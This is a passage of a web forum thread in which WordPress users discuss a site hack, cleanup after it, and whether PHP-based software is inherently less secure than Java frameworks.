got hacked

hahahahhah

btw, I just realised you finally made it to a dogpile thread… nice going!

I’ve been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I’m more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can’t rule out that it wasn’t my fault, nor the fact that I’m on a shared server. In moving to a new server, I’m installing everything clean and changing all passwords, etc. – but I’m not finished with the setup yet so I have to deal with this issue until I am.

I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.

elorgwhee,

I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.

I dont assume anything of a kind, and dont mean to diminish the seriousness of any site being hacked. We spend quite a bit of time on these forums, so brevity helps. It is true though, about about the unwashed masses though. ??

Ivovic wrote:

“easy to build websites with hard to find vulnerabilities”

I’m surprised the universe didn’t implode when you said that. If it’s easy to build… then surely it’s easier to find the vulnerabilities than if it were HARD to build with it, right?

Wrong, easy to build does not imply that it’s easy to find vulnerabilities.

PHP gives you lots of little shortcuts which make it easier to get the functionality you want, but often they also make it easier to do it in a way that allows malicious code-injection.

What’s your point anyway? You want something absolutely bug-free? Sorry it doesn’t exist.

Not bug-free, exploit free. There is plenty of software on my server that has never allowed my server to be compromised. PHP has allowed my server to be compromised at least twice!

The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it’s great. That’s the same reason the hackers are after it.

Hackers are after it due to the combination of its popularity, and its insecurity. There is plenty of popular and secure software out there.

Trade ease of use, compatibility and extensibility for obscurity, then we’ll see you on their forum complaining that they don’t have as many nice features as wordpress.

Useful features and security are not mutually exclusive, that is a lame cop-out. There are plenty of software platforms that are both featureful, popular, and secure. Perhaps if you spent more time away from PHP you’d see that.

There are plenty of software platforms that are both featureful, popular, and secure.

Okay, I’ll bite. Name a few. (And please understand: I’m NOT trying to be contentious here. I am actually quite curious to know your response.)

Whoo’s on first…

assuming that everyone affected by this is a complete idiot.

Of course not… A lot of what I’ve posted here addresses concerns which are largely out of your control. There’s no way you can possibly check every line of code for security issues yourself, so at some point you have to trust.

I love plugin developers because they’re the life of the wordpress community, but I advocate suspicion, because they’re often just hacks like me trying to cobble a solution together. Regardless of that, no amount of suspicion or research will ever guarantee your safety.

My first post in this thread addressed the issue as seriously as possible with the only course of action available to you right now, which is mopping up aisle 2… and hoping it’s not your favourite plugin that has the issue.

… the rest of this thread relates to some senseless emotional whining from someone who definitely has *not* been responsible… and the ensuing coping mechanisms we have for that.

Don’t feel herded into a group you know you’re not a part of. That distinction is obvious to anyone whose opinion counts for anything.

Okay, I’ll bite. Name a few. (And please understand: I’m NOT trying to be contentious here. I am actually quite curious to know your response.)

Exploits in Java code are rare, because Java frameworks tend to enforce good security practices (such as maintaining separation between data and code, and automatically escaping strings – something you have to do manually in PHP).

Getting specific, one Java-based framework I have personal familiarity with is Apache Wicket – and I’m not aware of a single successful exploit of a Wicket-based website.

Of course, you can write insecure code in any language, the difference is that in Java-based frameworks you really have to do something dumb, but in PHP the obvious way to do many things is insecure by default.

When an exploit is found in most software packages, it is a genuinely rare thing that people react strongly to. It seems that when an exploit is found in WordPress, it just results in another “ho-hum” point release.

WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects. Its depressing that expectations are so low around here ??

Wrong, easy to build does not imply that it’s easy to find vulnerabilities.

Bzzzt… sorry, but that’s a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

It’s completely logical that something simpler to understand is automatically simpler to keep track of.

Useful features and security are not mutually exclusive

You’re arguing against my words, not against the spirit of what I was saying. That’s a tired old forum tactic that I don’t plan to indulge.

Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That’s true in all concievable cases.

Take your finest example, add another feature, and you’ve increased the likelihood that it will have a bug (and that the bug may be an exploit).

Not bug-free, exploit free.

In the conversational sense, exploits are just a kind of bug.

There is plenty of software on my server that has never allowed my server to be compromised.

That doesn’t mean the exploits aren’t there. I’ve never seen under your mattress, but that doesn’t mean your sticky copy of equine weekly is a secret.

WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects

This I agree with… but not because it’s wordpress. This is an increasing phenomenon.

I’ve found the prevailing attitude to be quite poor, and the official response from people like Matt that folks should just upgrade and stop whining is less than satisfactory.

That doesn’t change anything though… and it certainly doesn’t explain your choice to keep using wordpress.

Find yourself a java-based publishing platform and use it, maybe…

I’ve used wordpress since the 1.5s and I’ve never had my wordpress hacked… so perhaps I’m not fed up yet. When I am fed up, you’ll know it because I won’t be here anymore.

WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

Try substituting the word Microsoft or Windows for WordPress in the above statement and you’ll find it’s true there as well. ??

before we get stuck into windows and ms-bashing, lets take a moment to research the actual statistics for security vulnerabilities in linux vs windows (and firefox vs IE) over the last 8 years.

I think its high time we got over windows98 and started addressing the reality.

..that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

Spend some time using phpBB. Most developers of free open-source PHP projects have a similar response.

Ivovic wrote:

Bzzzt… sorry, but that’s a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

Dude, you don’t know what you are talking about. These ugly kludges may make it easier to write insecure code, but often there is an inverse relationship between ease of writing and ease of reading, just look at Perl. PHP is a horribly designed language, it encourages insecure coding practices, and they don’t even bother to keep the API stable from release to release. In short, PHP is a mess of a programming language.

You’re arguing against my words, not against the spirit of what I was saying.

Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

That’s a tired old forum tactic that I don’t plan to indulge.

A tired old forum tactic called “rational debate”.

Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That’s true in all concievable cases.

That is only true if you assume that all code is equal, but it isn’t. 10 lines of secure code is better than 1 line of insecure code.

In the conversational sense, exploits are just a kind of bug.

Yes, and…? If A is a kind of B, that doesn’t mean that A is the same as B.

That doesn’t mean the exploits aren’t there. I’ve never seen under your mattress, but that doesn’t mean your sticky copy of equine weekly is a secret.

Now you are just rambling incoherently. Of course there could be unknown exploits in non-PHP apps on my server, the point is that there are two known exploits in the PHP apps, in addition to all the unknown exploits there might be.

Thanks whooami & Ivovic.

Between work, I’m still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I’m not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it’s all manual.
>_<